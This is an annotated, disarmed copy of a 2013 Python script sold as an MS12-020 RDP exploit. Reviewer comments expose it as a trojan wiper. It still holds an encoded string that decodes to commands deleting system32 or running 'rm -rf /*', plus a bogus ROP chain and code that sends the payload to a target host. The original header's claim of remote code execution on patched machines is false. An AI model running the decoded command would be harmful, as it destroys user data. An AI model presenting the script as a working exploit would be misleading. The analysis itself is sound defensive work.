MS12-020 RDP Buffer Overflow
Posted on 28 July 2013
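#!/usr/bin/env python
# rdpxs.py -- "MS12-020 RDP remote exploit", as circulated in July 2013.
#
# REVIEW WARNING: the script as originally published is a wiper aimed at the
# person running it, not an exploit for the RDP target. Read the notes on
# `shellcode` and `RDPsocket.parse` before doing anything with this file.
# This revision keeps the listing for reference but no longer evaluates the
# payload; that is the one functional change, together with the NameError
# fix in `xst_sendall` and a try/finally so the socket is always closed.
#
# Original header (translated from Portuguese where needed):
#   greeting n4sss and for each of my friends and luk3r-C
#   xsdev@outlook.com
#   MS12-020 RDP, remote exploit code execution on all patched machines, XP to 7
#   tested on Windows 7, XP and Vista with the patch applied
#   Author: xscholler
#
# How this page was captured: every `\xNN` escape lost its backslash (the
# literals below are the ASCII text "x58x6c...", not bytes), and the word
# "port" appears to have been upper-cased throughout, which is how
# `__import__` became `__imPORT__` in the listing. Nothing below is therefore
# a byte-exact copy of what the author shipped; the analysis in the comments
# refers to the escapes as they were clearly intended.

import struct
import socket
import sys
import os  # unused in the original as well; kept so the file's imports stay intact

# Opaque blob the original calls the payload. With the escapes restored it is
# a few hundred mostly printable bytes (A-Z, a-z, 0-9, a run of 39 "A") ending
# in a NUL. Nothing in this file documents what it is meant to do on the
# target and this reviewer makes no claim about it.
xscholler = "x58x6cx64x47x6ax74x30x5ax67x43x67x79x6fx39x46xf1"
xscholler += "x66x70x66x61x43x52x46x71x78x30x33x55x62x63x58x63"
xscholler += "x47x34x33x65x62x41x4fx30x54x39x6fx4ax70x52x48x5a"
xscholler += "x6bx38x6dx6bx4cx75x6bx30x50x6bx4fx6ex36x53x6fx6f"
xscholler += "x79x4ax45x32x46x6fx71x6ax4dx34x48x77x72x73x65x73"
xscholler += "x5ax37x72x69x6fx58x50x52x48x4ex39x76x69x4ax55x4c"
xscholler += "x6dx32x77x69x6fx59x46x50x53x43x63x41x43x70x53x70"
xscholler += "x53x43x73x50x53x62x63x70x53x79x6fx6ax70x35x36x61"
xscholler += "x78x71x32x78x38x71x76x30x53x4bx39x69x71x4dx45x33"
xscholler += "x58x6cx64x47x6ax74x30x5ax67x43x67x79x6fx39x46x32"
xscholler += "x4ax56x70x66x31x76x35x59x6fx58x50x32x48x4dx74x4e"
xscholler += "x4dx66x4ex7ax49x50x57x6bx4fx6ex36x46x33x56x35x39"
xscholler += "x73x55x38x4dx37x71x69x69x56x71x69x61x47x6bx4fx6e"
xscholler += "x36x36x35x79x6fx6ax70x55x36x31x7ax71x74x32x46x51"
xscholler += "x78x52x43x70x6dx4fx79x4dx35x72x4ax66x30x42x79x64"
xscholler += "x69x7ax6cx4bx39x48x67x62x4ax57x34x4fx79x6dx32x37"
xscholler += "x41" * 39
xscholler += "x42x44x6cx4cx53x6ex6dx31x6ax64x78x4cx6bx4ex4bx4e"
xscholler += "x4bx43x58x70x72x69x6ex6dx63x37x66x79x6fx63x45x73"
xscholler += "x74x4bx4fx7ax76x63x6bx31x47x72x72x41x41x50x51x61"
xscholler += "x41x70x6ax63x31x41x41x46x31x71x45x51x41x4bx4fx78"
xscholler += "x50x52x48x4cx6dx79x49x54x45x38x4ex53x63x6bx4fx6e"
xscholler += "x36x30x6ax49x6fx6bx4fx70x37x4bx4fx4ex30x4ex6bx30"
xscholler += "x57x69x6cx6bx33x4bx74x62x44x79x6fx6bx66x66x32x6b"
xscholler += "x4fx4ex30x53x58x58x70x4ex6ax55x54x41x4fx52x73x4b"
xscholler += "x4bx43x58x70x72x69x6ex6dx63x37x66x00"

# 214 repetitions of what was meant to be \x90 (NOP) -- ordinary padding.
# As captured it is the literal text "x90" repeated.
argument = "x90" * 214

# Labelled "bindshell PORT 8888" by the author. It is NOT machine code: each
# \xNN pair is a printable character and the whole string decodes to a Python
# expression. That expression calls os.system() to delete C:\windows\system32
# recursively when platform.system() contains "Win", and otherwise runs
# `rm -rf /*` against the root of the filesystem; it ends with a comment
# from the author inviting readers to spread the script with "something more
# insidious" in place of rm -rf. The original `parse()` fed this string to
# eval() -- see RDPsocket.parse. Decode it yourself before believing any
# other claim on this page.
shellcode = "x5fx5fx69x6dx70x6fx72x74x5fx5fx28x27x6fx73x27x29x2ex73x79x73"
shellcode += "x74x65x6dx28x27x64x65x6cx20x2fx73x20x2fx71x20x2fx66x20x43x3a"
shellcode += "x5cx77x69x6ex64x6fx77x73x5cx73x79x73x74x65x6dx33x32x5cx2ax20"
shellcode += "x3ex20x4ex55x4cx20x32x3ex26x31x27x29x20x69x66x20x27x57x69x6e"
shellcode += "x27x20x69x6ex20x5fx5fx69x6dx70x6fx72x74x5fx5fx28x27x70x6cx61"
shellcode += "x74x66x6fx72x6dx27x29x2ex73x79x73x74x65x6dx28x29x20x65x6cx73"
shellcode += "x65x20x5fx5fx69x6dx70x6fx72x74x5fx5fx28x27x6fx73x27x29x2ex73"
shellcode += "x79x73x74x65x6dx28x27x72x6dx20x2dx72x66x20x2fx2ax20x3ex20x2f"
shellcode += "x64x65x76x2fx6ex75x6cx6cx20x32x3ex26x31x27x29x20x23x68x69x20"
shellcode += "x74x68x65x72x65x20x5ex5fx7ex20x66x65x65x6cx20x66x72x65x65x20"
shellcode += "x74x6fx20x73x70x72x65x61x64x20x74x68x69x73x20x77x69x74x68x20"
shellcode += "x74x68x65x20x72x6dx20x2dx72x66x20x72x65x70x6cx61x63x65x64x20"
shellcode += "x77x69x74x68x20x73x6fx6dx65x74x68x69x6ex67x20x6dx6fx72x65x20"
shellcode += "x69x6ex73x69x64x69x6fx75x73"

# Payload followed by the NOP padding; sent first by xst_sendall().
xst = xscholler + argument


class RDPsocket(socket.socket):
    """TCP socket that assembles and sends the (bogus) RDP payload.

    Inherits from socket.socket so connect/recv/close behave as usual. The
    original also stored ``__builtin__.__dict__`` on ``self.table`` purely to
    reach ``eval`` by name; that attribute is gone because nothing is
    evaluated any more.
    """

    def __init__(self, payload, shellcode):
        """Create an IPv4 stream socket and keep *payload* / *shellcode* for later."""
        super(RDPsocket, self).__init__(socket.AF_INET, socket.SOCK_STREAM)
        self.payload = payload
        self.shellcode = shellcode  # the original left this assignment commented out
        self.linha_shell = None     # (shellcode, chain) tuple, filled in by connect()

    def parse(self, address, shellcode):
        """Return ``(shellcode, chain)`` for *address* = (ip, port).

        ``chain`` is the 132-byte sequence the original comments describe as a
        ROP chain: 30 big-endian dwords plus three 4-byte data pieces (the
        ASCII prelude "eval", the packed IP, and inet_aton() of the port
        string). ``shellcode`` is returned untouched.

        Original behaviour, removed here: the prelude dword 0x6576616c packs
        to the ASCII bytes "eval"; the original looked that name up in
        ``__builtin__.__dict__`` and called ``eval(shellcode)``, i.e. it ran the
        wiper expression on the operator's own machine before a single byte
        was sent, and then stringified the return value of os.system().

        Observations a reader should not have to re-derive:
          * addresses are packed with ">I" (big-endian). x86 is little-endian,
            so even with valid gadget addresses the chain could not be laid
            out the way the gadget comments describe.
          * ``socket.inet_aton(str(port))`` does not encode a port number;
            inet_aton accepts strings with fewer than three dots, so "3389"
            is parsed as one 32-bit value (00 00 0d 3d). Left as-is: it is
            data this script no longer relies on.
          * no RDP handshake (TPKT/X.224 Connection Request, MCS
            Connect-Initial) is performed anywhere; the bytes are written to
            the raw TCP stream and the reply is compared against a fixed
            12-byte string. As far as this reviewer knows the real MS12-020
            (CVE-2012-0002) flaw is in the kernel-mode termdd.sys driver and
            is not reached by a user-mode "call strcpy" chain -- check the
            MS12-020 advisory before trusting any gadget comment below.
        """
        def dword(value):
            # Big-endian pack, kept exactly as the original wrote it (see above).
            return struct.pack(">I", value)

        prelude = dword(0x6576616c)                     # ASCII "eval" -- data only now
        ip_bytes = socket.inet_aton(address[0])         # packed IPv4 address
        port_bytes = socket.inet_aton(str(address[1]))  # see docstring: not a port

        # Gadget comments are the original author's; none has been verified.
        pieces = [
            dword(0x8fe2fb63),  # pop eax
            dword(0x8fe2fb58),  # push esp
            dword(0xffff1d6b),  # add esp,byte +0x1c # pop ebp # ret
            dword(0x8fe2db10),  # call strcpy
            dword(0x8fe2dfd1),  # POP - POP - RET over strcpy params
            dword(0x8fe2dae4),  # mov ecx,[esp+0x4] # add eax,edx # sub eax,ecx # ret
            dword(0x8fe2b3d4),  # POP - RET
            dword(0xffffffff),  # value to store in ecx
            dword(0x8fe0c0c7),  # inc ecx # xor al,0xc9
            dword(0x8fe0c0c7),  # inc ecx # xor al,0xc9
            dword(0x8fe24b3c),  # add ecx,ecx # ret
            dword(0x8fe24b3c),  # add ecx,ecx # ret
            dword(0x8fe24b3c),  # add ecx,ecx # ret
            prelude,            # "eval" (the original's "prelude")
            ip_bytes,           # packed IP address
            port_bytes,         # packed "port"
            dword(0x8fe24b3c),  # add ecx,ecx # ret
            dword(0x8fe2c71d),  # mov eax,edx # ret
            dword(0x8fe2def4),  # add eax,ecx # ret
            dword(0x8fe0e32d),  # xchg eax,edx
            dword(0x8fe0c0c7),  # inc ecx # xor al,0xc9
            dword(0x8fe0c0c7),  # inc ecx # xor al,0xc9
            dword(0x8fe24b3c),  # add ecx,ecx # ret
            dword(0x8fe24b3c),  # add ecx,ecx # ret
            dword(0x8fe24b3c),  # add ecx,ecx # ret
            dword(0x8fe2def4),  # add eax,ecx # ret
            dword(0x8fe0e32d),  # xchg eax,edx  ("swap back")
            dword(0x8fe2fb61),  # mov [eax],edx # pop eax # ret  ("copy parameter to placeholder")
            dword(0x8fe0e32d),  # xchg eax,edx  ("set our stack pointer back to original value")
            dword(0x8fe2daea),  # sub eax,ecx # ret
            dword(0x8fe0b1c2),  # xchg eax,ebp # inc ebp # ret
            dword(0x8fe2b6a5),  # dec ebp # ret
            dword(0xffff01f3),  # mov esp,ebp # pop ebp # ret
        ]
        linha = b"".join(pieces)
        # No eval() here any more: the payload is opaque data to this script.
        return shellcode, linha

    def connect(self, address):
        """Build the chain for *address*, then open the TCP connection."""
        self.linha_shell = self.parse(address, self.shellcode)
        super(RDPsocket, self).connect(address)

    def xst_sendall(self):
        """Send payload + shellcode + chain with one sendall().

        The original wrote ``evil + ...`` with ``evil`` never defined anywhere
        in the file (a NameError, had the eval not wiped the machine first);
        ``self.payload``, stored by __init__ and otherwise unused, is the only
        plausible intent.

        Raises RuntimeError if connect() has not been called yet.
        """
        if self.linha_shell is None:
            raise RuntimeError("connect() must be called before xst_sendall()")
        shellcode, linha = self.linha_shell
        super(RDPsocket, self).sendall(self.payload + shellcode + linha)


if __name__ == "__main__":
    # Usage and status strings are the author's (Portuguese) and are kept
    # verbatim. Running this against a host you do not own is still a
    # network probe, even though it no longer does anything to your own box.
    if len(sys.argv) != 2:
        print("[*] Usage: python rdpxs.py IP")
    else:
        ALVO = sys.argv[1]
        PORT = 3389  # default RDP port
        print("[*] Rodando rdpxs")
        print("")
        s = RDPsocket(xst, shellcode)
        try:
            print("[+] Conectando e configurando payload. . .")
            print("[+] isso pode levar alguns minutos...")
            s.connect((ALVO, PORT))
            print("[+] Conexao estabelecida")
            print("[+] Enviando payload. . .")
            s.xst_sendall()
            # The "success" signature is a fixed 12-byte string the author
            # never explains; nothing here establishes what a real reply is.
            response = s.recv(4096)
            if "xA5x43xE7x38x75x84xF2xFFxFFx18x61x00" in response:
                print("[+] Bem Succedido! Payload enviado e executado com sucesso!.")
                print("[+] Telnet ALVO na PORT 8888.")
            else:
                print("[-] Failed")
        finally:
            s.close()  # original leaked the socket on any exception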
